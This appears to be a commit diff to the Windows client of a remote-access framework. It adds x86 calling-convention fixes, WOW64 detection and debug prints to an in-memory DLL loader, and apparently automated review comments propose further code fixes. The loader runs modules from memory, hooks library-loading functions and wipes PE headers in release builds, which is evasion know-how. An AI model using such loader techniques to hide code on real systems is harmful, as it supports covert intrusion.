[Experemental] client/windows: Fix x86-related issues
parent
8d7b168889
commit
7f40611cbf
|
@ -153,8 +153,9 @@ BOOL initialize_python(int argc, char *argv[], BOOL is_shared_object) {
|
|||
|
||||
Py_IncRef(py_argv);
|
||||
|
||||
for (i = 0; i<argc; i++)
|
||||
for (i = 0; i<argc && argv[i]; i++) {
|
||||
PyList_Append(py_argv, PyString_FromString(argv[i]));
|
||||
}
|
||||
|
||||
PySys_SetObject("executable", PyString_FromString(OSGetProgramName()));
|
||||
PySys_SetObject("argv", py_argv);
|
||||
|
@ -163,6 +164,7 @@ BOOL initialize_python(int argc, char *argv[], BOOL is_shared_object) {
|
|||
|
||||
setup_jvm_class();
|
||||
|
||||
dprint("Python initialized\n");
|
||||
return TRUE;
|
||||
|
||||
lbExit1:
|
||||
|
@ -191,7 +193,6 @@ void run_pupy() {
|
|||
char *pupy_init_bytecode_c;
|
||||
Py_ssize_t pupy_init_bytecode_c_size;
|
||||
|
||||
|
||||
dprint("Load config\n");
|
||||
len.c[3] = __config__[0];
|
||||
len.c[2] = __config__[1];
|
||||
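Review bot: `PyList_Append(py_argv, PyString_FromString(argv[i]))` in the new loop body leaks one reference per argument — PyList_Append takes its own reference and the temporary returned by PyString_FromString is never released — and a NULL from PyString_FromString (allocation failure) is passed straight into PyList_Append, whose error return is also ignored. The `PySys_SetObject("executable", PyString_FromString(OSGetProgramName()))` line below it has the same unchecked temporary. Holding the temporary in a local, checking it and releasing it after the append fixes both; initialize_python starts and ends outside the hunk, and `lbExit1` is only visible as a label in the next hunk, so the jump below assumes it is the function's existing error path and should be confirmed.
```c
    for (i = 0; i<argc && argv[i]; i++) {
        PyObject *arg = PyString_FromString(argv[i]);
        if (!arg || PyList_Append(py_argv, arg) < 0) {
            Py_XDECREF(arg);
            goto lbExit1; /* existing error path — confirm it releases py_argv */
        }
        Py_DECREF(arg); /* py_argv now holds its own reference */
    }
    // … unchanged: PySys_SetObject("executable", ...) / PySys_SetObject("argv", ...) …
```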
|
|
|
@ -195,9 +195,14 @@ FinalizeSection(PMEMORYMODULE module, PSECTIONFINALIZEDATA sectionData) {
|
|||
if (sectionData->address == sectionData->alignedAddress &&
|
||||
(sectionData->last ||
|
||||
module->headers->OptionalHeader.SectionAlignment == module->pageSize ||
|
||||
(sectionData->size % module->pageSize) == 0)
|
||||
) {
|
||||
(sectionData->size % module->pageSize) == 0))
|
||||
{
|
||||
// Only allowed to decommit whole pages
|
||||
dprint(
|
||||
"VirtualFree: %p - %p (%lu)\n",
|
||||
sectionData->address, (PCHAR) sectionData->address + sectionData->size, sectionData->size
|
||||
);
|
||||
|
||||
VirtualFree(sectionData->address, sectionData->size, MEM_DECOMMIT);
|
||||
}
|
||||
return TRUE;
|
||||
|
@ -213,6 +218,10 @@ FinalizeSection(PMEMORYMODULE module, PSECTIONFINALIZEDATA sectionData) {
|
|||
}
|
||||
|
||||
// change memory access flags
|
||||
dprint(
|
||||
"VirtualProtect: %p - %p (%lu) %08x\n",
|
||||
sectionData->address, (PCHAR) sectionData->address + sectionData->size, sectionData->size, protect
|
||||
);
|
||||
if (VirtualProtect(sectionData->address, sectionData->size, protect, &oldProtect) == 0) {
|
||||
#ifdef DEBUG_OUTPUT
|
||||
OutputLastError("Error protecting memory page");
|
||||
|
@ -285,7 +294,8 @@ ExecuteTLS(PMEMORYMODULE module)
|
|||
PIMAGE_TLS_DIRECTORY tls;
|
||||
PIMAGE_TLS_CALLBACK* callback;
|
||||
|
||||
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_TLS);
|
||||
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(
|
||||
module, IMAGE_DIRECTORY_ENTRY_TLS);
|
||||
if (directory->VirtualAddress == 0) {
|
||||
return TRUE;
|
||||
}
|
||||
|
@ -294,6 +304,7 @@ ExecuteTLS(PMEMORYMODULE module)
|
|||
callback = (PIMAGE_TLS_CALLBACK *) tls->AddressOfCallBacks;
|
||||
if (callback) {
|
||||
while (*callback) {
|
||||
dprint("Call TLS Callback %p\n", callback);
|
||||
(*callback)((LPVOID) codeBase, DLL_PROCESS_ATTACH, NULL);
|
||||
callback++;
|
||||
}
|
||||
|
@ -809,10 +820,12 @@ HMEMORYMODULE MemoryLoadLibraryEx(
|
|||
|
||||
dprint("MemoryLoadLibraryEx: Library loaded\n");
|
||||
|
||||
#ifndef DEBUG
|
||||
// Cleanup PE headers
|
||||
CleanupHeaders(result);
|
||||
|
||||
dprint("MemoryLoadLibraryEx: headers cleaned up\n");
|
||||
#endif
|
||||
|
||||
return (HMEMORYMODULE)result;
|
||||
|
||||
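Review bot: The `dprint("VirtualFree: %p - %p (%lu)\n", ...)` call in FinalizeSection prints sectionData->size with `%lu`, and the `"VirtualProtect: %p - %p (%lu) %08x\n"` call in the next hunk does the same. If that field is a SIZE_T, which its use as the VirtualFree/VirtualProtect size argument suggests, `%lu` only matches on 32-bit builds; on 64-bit Windows `long` is 32 bits and the printed size is truncated. `%Iu` (MSVC runtime) or `%zu` where dprint's backend supports C99 is the matching specifier, e.g. `"VirtualFree: %p - %p (%Iu)\n"`. I have not seen the PSECTIONFINALIZEDATA definition or dprint's implementation, so both the field type and the supported specifiers are inferred; both FinalizeSection hunks cut the function at their edges.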
|
|
|
@ -39,14 +39,14 @@ typedef void *HCUSTOMMODULE;
|
|||
extern "C" {
|
||||
#endif
|
||||
|
||||
typedef HMODULE (*CustomGetModuleHandleA)(LPCSTR);
|
||||
typedef HMODULE (*CustomGetModuleHandleW)(LPCWSTR);
|
||||
typedef HMODULE (*CustomLoadLibraryExA)(LPCSTR, HANDLE, DWORD);
|
||||
typedef HMODULE (*CustomLoadLibraryExW)(LPCWSTR, HANDLE, DWORD);
|
||||
typedef HCUSTOMMODULE (*CustomLoadLibraryW)(LPCWSTR);
|
||||
typedef HCUSTOMMODULE (*CustomLoadLibraryA)(LPCSTR);
|
||||
typedef FARPROC (*CustomGetProcAddress)(HCUSTOMMODULE, LPCSTR);
|
||||
typedef void (*CustomFreeLibraryFunc)(HCUSTOMMODULE);
|
||||
typedef HMODULE (CALLBACK *CustomGetModuleHandleA)(LPCSTR);
|
||||
typedef HMODULE (CALLBACK *CustomGetModuleHandleW)(LPCWSTR);
|
||||
typedef HMODULE (CALLBACK *CustomLoadLibraryExA)(LPCSTR, HANDLE, DWORD);
|
||||
typedef HMODULE (CALLBACK *CustomLoadLibraryExW)(LPCWSTR, HANDLE, DWORD);
|
||||
typedef HCUSTOMMODULE (CALLBACK *CustomLoadLibraryW)(LPCWSTR);
|
||||
typedef HCUSTOMMODULE (CALLBACK *CustomLoadLibraryA)(LPCSTR);
|
||||
typedef FARPROC (CALLBACK *CustomGetProcAddress)(HCUSTOMMODULE, LPCSTR);
|
||||
typedef void (CALLBACK *CustomFreeLibraryFunc)(HCUSTOMMODULE);
|
||||
|
||||
/**
|
||||
* Load EXE/DLL from memory location.
|
||||
|
@ -85,14 +85,6 @@ FARPROC MemoryGetProcAddress(HMEMORYMODULE, LPCSTR);
|
|||
*/
|
||||
void MemoryFreeLibrary(HMEMORYMODULE);
|
||||
|
||||
HMODULE MyGetModuleHandleA(LPCSTR name);
|
||||
HMODULE MyGetModuleHandleW(LPCWSTR name);
|
||||
HMODULE MyLoadLibraryA(LPCSTR name);
|
||||
HMODULE MyLoadLibraryW(LPCWSTR name);
|
||||
|
||||
HMODULE MyLoadLibraryExA(LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);
|
||||
HMODULE MyLoadLibraryExW(LPCWSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
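Review bot: The `CALLBACK` added to the eight `Custom*` function-pointer typedefs makes this header depend on `<windows.h>` having defined that macro, and unlike MyLoadLibrary.h in this same commit it adds no fallback; the includes above the hunk are not visible, so this may already be guaranteed and the inconsistency is then only cosmetic. More useful would be a one-line comment above the typedefs recording why the convention matters, e.g. `/* CALLBACK (stdcall on x86): presumably these are assigned the My* functions from MyLoadLibrary.c, which carry the same convention; a mismatch corrupts the stack on x86 */`, since nothing on this page states that the two sets must agree.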
|
|
|
@ -252,7 +252,7 @@ static PHCUSTOMLIBRARY _AddMemoryModule(
|
|||
/****************************************************************
|
||||
* Public functions
|
||||
*/
|
||||
HMODULE MyGetModuleHandleA(LPCSTR name)
|
||||
HMODULE CALLBACK MyGetModuleHandleA(LPCSTR name)
|
||||
{
|
||||
PHCUSTOMLIBRARY lib;
|
||||
|
||||
|
@ -331,7 +331,8 @@ BOOL _CreateModuleMapping(HMODULE hModule, HANDLE *phMapping, PVOID *ppvMem)
|
|||
return TRUE;
|
||||
}
|
||||
|
||||
HMODULE MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPrivate)
|
||||
HMODULE
|
||||
MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPrivate)
|
||||
{
|
||||
HMODULE hLoadedModule = NULL;
|
||||
|
||||
|
@ -402,7 +403,7 @@ HMODULE MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPriva
|
|||
return LoadLibrary(name);
|
||||
}
|
||||
|
||||
HMODULE MyGetModuleHandleW(LPCWSTR name) {
|
||||
HMODULE CALLBACK MyGetModuleHandleW(LPCWSTR name) {
|
||||
PSTR pszName = NULL;
|
||||
HMODULE hResult = NULL;
|
||||
DWORD dwRequiredSize = WideCharToMultiByte(
|
||||
|
@ -435,7 +436,7 @@ HMODULE MyGetModuleHandleW(LPCWSTR name) {
|
|||
return GetModuleHandleW(name);
|
||||
}
|
||||
|
||||
HMODULE MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||
HMODULE CALLBACK MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||
HMODULE hModule = MyGetModuleHandleA(name);
|
||||
if (hModule)
|
||||
return hModule;
|
||||
|
@ -443,7 +444,7 @@ HMODULE MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
|||
return LoadLibraryExA(name, hFile, dwFlags);
|
||||
}
|
||||
|
||||
HMODULE MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||
HMODULE CALLBACK MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||
HMODULE hModule = MyGetModuleHandleW(name);
|
||||
if (hModule)
|
||||
return hModule;
|
||||
|
@ -451,7 +452,7 @@ HMODULE MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
|||
return LoadLibraryExW(name, hFile, dwFlags);
|
||||
}
|
||||
|
||||
HMODULE MyLoadLibraryA(LPCSTR name) {
|
||||
HMODULE CALLBACK MyLoadLibraryA(LPCSTR name) {
|
||||
HMODULE hModule = MyGetModuleHandleA(name);
|
||||
if (hModule)
|
||||
return hModule;
|
||||
|
@ -459,7 +460,7 @@ HMODULE MyLoadLibraryA(LPCSTR name) {
|
|||
return LoadLibraryA(name);
|
||||
}
|
||||
|
||||
HMODULE MyLoadLibraryW(LPCWSTR name) {
|
||||
HMODULE CALLBACK MyLoadLibraryW(LPCWSTR name) {
|
||||
HMODULE hModule = MyGetModuleHandleW(name);
|
||||
if (hModule)
|
||||
return hModule;
|
||||
|
@ -467,7 +468,7 @@ HMODULE MyLoadLibraryW(LPCWSTR name) {
|
|||
return LoadLibraryW(name);
|
||||
}
|
||||
|
||||
BOOL MyFreeLibrary(HMODULE module)
|
||||
BOOL CALLBACK MyFreeLibrary(HMODULE module)
|
||||
{
|
||||
PHCUSTOMLIBRARY lib = _FindMemoryModule(NULL, module);
|
||||
if (lib) {
|
||||
|
@ -540,7 +541,7 @@ BOOL isAllowedSymbol(PHCUSTOMLIBRARY lib, LPCSTR procname) {
|
|||
return FALSE;
|
||||
}
|
||||
|
||||
FARPROC MyGetProcAddress(HMODULE module, LPCSTR procname)
|
||||
FARPROC CALLBACK MyGetProcAddress(HMODULE module, LPCSTR procname)
|
||||
{
|
||||
PHCUSTOMLIBRARY lib;
|
||||
FARPROC fpFunc = NULL;
|
||||
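Review bot: With `CALLBACK` on MyGetModuleHandleA/W, MyLoadLibraryA/W/ExA/ExW, MyFreeLibrary and MyGetProcAddress these definitions become stdcall on x86, while `MyLoadLibraryEx` — reformatted in the same file but left without `CALLBACK` — keeps the default convention; the split mirrors the Custom* typedefs and is presumably deliberate, but nothing in the file says so. Stdcall also changes the decorated symbol name on x86 (`_MyLoadLibraryA@4` rather than `_MyLoadLibraryA`), so any .def file or by-name lookup of these functions would have to follow; I cannot see whether one exists. A comment above `MyGetModuleHandleA`, `/* CALLBACK (stdcall on x86): this set must match the Custom* typedefs it is presumably assigned to; MyLoadLibraryEx is the cdecl internal entry point */`, would record the rule for the next edit.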
|
|
|
@ -3,16 +3,22 @@
|
|||
|
||||
#include <windows.h>
|
||||
|
||||
#ifndef CALLBACK
|
||||
#define CALLBACK WINAPI
|
||||
#endif
|
||||
|
||||
HMODULE MyLoadLibrary(LPCSTR, void *, void *);
|
||||
HMODULE MyLoadLibraryEx(LPCSTR, void *, void *, BOOL);
|
||||
|
||||
HMODULE MyGetModuleHandle(LPCSTR);
|
||||
BOOL MyFreeLibrary(HMODULE);
|
||||
HMODULE CALLBACK MyLoadLibraryA(LPCSTR);
|
||||
HMODULE CALLBACK MyLoadLibraryW(LPCWSTR);
|
||||
HMODULE CALLBACK MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags);
|
||||
HMODULE CALLBACK MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags);
|
||||
HMODULE CALLBACK MyGetModuleHandleA(LPCSTR name);
|
||||
HMODULE CALLBACK MyGetModuleHandleW(LPCWSTR name);
|
||||
FARPROC CALLBACK MyGetProcAddress(HMODULE, LPCSTR);
|
||||
BOOL CALLBACK MyFreeLibrary(HMODULE module);
|
||||
|
||||
HMODULE MyLoadLibraryA(LPCSTR);
|
||||
HMODULE MyLoadLibraryW(LPCWSTR);
|
||||
|
||||
FARPROC MyGetProcAddress(HMODULE, LPCSTR);
|
||||
FARPROC MyFindProcAddress(LPCSTR modulename, LPCSTR procname);
|
||||
|
||||
VOID MySetLibraries(PVOID pLibraries);
|
||||
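Review bot: The new `#ifndef CALLBACK` / `#define CALLBACK WINAPI` fallback sits directly after `#include <windows.h>`, which is where both CALLBACK and WINAPI are normally defined, so in the one situation where CALLBACK is missing WINAPI is almost certainly missing too and the fallback expands to an undeclared identifier. If a fallback is wanted, spell out the convention instead, `#define CALLBACK __stdcall`, or drop the three lines. Separately, `MyLoadLibrary`, `MyLoadLibraryEx`, `MyGetModuleHandle` and `MyFindProcAddress` stay without CALLBACK while the A/W variants gain it; if that is intended, a short comment naming which set is the stdcall hook interface would keep a later "fix" from breaking the x86 calling convention again.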
|
|
|
@ -14,10 +14,10 @@
|
|||
#define PATH_MAX 260
|
||||
#endif
|
||||
|
||||
typedef FARPROC (*resolve_symbol_t) (HMODULE hModule, const char *name);
|
||||
typedef FARPROC (WINAPI *resolve_symbol_t) (HMODULE hModule, const char *name);
|
||||
|
||||
static char *OSGetProgramName() {
|
||||
static char *program_name = NULL;
|
||||
static const char *program_name = "";
|
||||
static BOOL is_set = FALSE;
|
||||
|
||||
wchar_t exe[PATH_MAX];
|
||||
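Review bot: `static const char *program_name = "";` changes the variable's type, but `OSGetProgramName` keeps the return type `static char *`, so if the function's `return program_name;` below the hunk is unchanged it now discards a const qualifier — a warning in C and an error under C++. Change the signature to `static const char *OSGetProgramName(void)`; the only caller visible on this page, `PySys_SetObject("executable", PyString_FromString(OSGetProgramName()))`, accepts a const char * anyway. The `""` default in place of NULL is what removes the NULL dereference in that caller, so that part of the change is worth keeping; the rest of the function is outside the hunk.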
|
|
|
@ -166,6 +166,30 @@ static const PSTR Kernel32AllowedPrefixes[] = {
|
|||
"Write", "Read", "Terminate", "Resume", "Virtual",
|
||||
"Reg", NULL
|
||||
};
|
||||
|
||||
typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
|
||||
LPFN_ISWOW64PROCESS fnIsWow64Process;
|
||||
|
||||
BOOL IsWow64()
|
||||
{
|
||||
#ifdef WIN_X86
|
||||
BOOL bIsWow64 = TRUE;
|
||||
|
||||
//IsWow64Process is not available on all supported versions of Windows.
|
||||
//Use GetModuleHandle to get a handle to the DLL that contains the function
|
||||
//and GetProcAddress to get a pointer to the function if available.
|
||||
|
||||
fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(
|
||||
GetModuleHandle("kernel32"),"IsWow64Process");
|
||||
|
||||
if(NULL != fnIsWow64Process)
|
||||
fnIsWow64Process(GetCurrentProcess(),&bIsWow64);
|
||||
|
||||
return bIsWow64;
|
||||
#else
|
||||
return FALSE;
|
||||
#endif
|
||||
}
|
||||
#endif
|
||||
|
||||
void initialize(BOOL isDll, on_exit_session_t *cb) {
|
||||
|
@ -185,9 +209,13 @@ void initialize(BOOL isDll, on_exit_session_t *cb) {
|
|||
dprint("TEMPLATE REV: %s\n", GIT_REVISION_HEAD);
|
||||
|
||||
#ifdef _PUPY_PRIVATE_NT
|
||||
hNtDll = GetModuleHandleA("NTDLL.DLL");
|
||||
hKernelBase = GetModuleHandleA("KERNELBASE.DLL");
|
||||
hKernel32 = GetModuleHandleA("KERNEL32.DLL");
|
||||
if (IsWow64()) {
|
||||
dprint("WOW64 + _PUPY_PRIVATE_NT known to be broken right now\n");
|
||||
} else {
|
||||
hNtDll = GetModuleHandleA("NTDLL.DLL");
|
||||
hKernelBase = GetModuleHandleA("KERNELBASE.DLL");
|
||||
hKernel32 = GetModuleHandleA("KERNEL32.DLL");
|
||||
}
|
||||
|
||||
if (hNtDll && hKernel32 && hKernelBase) {
|
||||
HMODULE hPrivate;
|
||||
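Review bot: `fnIsWow64Process` is a file-scope variable with external linkage that only `IsWow64` writes, and `GetModuleHandle("kernel32")` is the TCHAR-generic form while the rest of this file (the `GetModuleHandleA("NTDLL.DLL")` lines in the next hunk) calls the A variant explicitly, so this call fails to compile under a UNICODE build. The BOOL returned by `fnIsWow64Process` is also ignored; on failure bIsWow64 keeps its initial TRUE, which is the conservative choice for the `_PUPY_PRIVATE_NT` caller but should be stated rather than left to the initializer. The `#endif` after the function shows IsWow64 sits inside a conditional block opened above the hunk; I could not confirm it is the same guard under which it is called. Moving the pointer into the function, using GetModuleHandleA and checking the call gives:
```c
BOOL IsWow64(void)
{
#ifdef WIN_X86
    /* Default to TRUE: if IsWow64Process is unavailable or fails, report WOW64
       so the caller skips the private-NT path (the safe choice for it). */
    BOOL bIsWow64 = TRUE;
    LPFN_ISWOW64PROCESS fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(
        GetModuleHandleA("kernel32"), "IsWow64Process");

    if (fnIsWow64Process != NULL && !fnIsWow64Process(GetCurrentProcess(), &bIsWow64))
        bIsWow64 = TRUE;

    return bIsWow64;
#else
    // … unchanged: return FALSE …
#endif
}
```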
|
|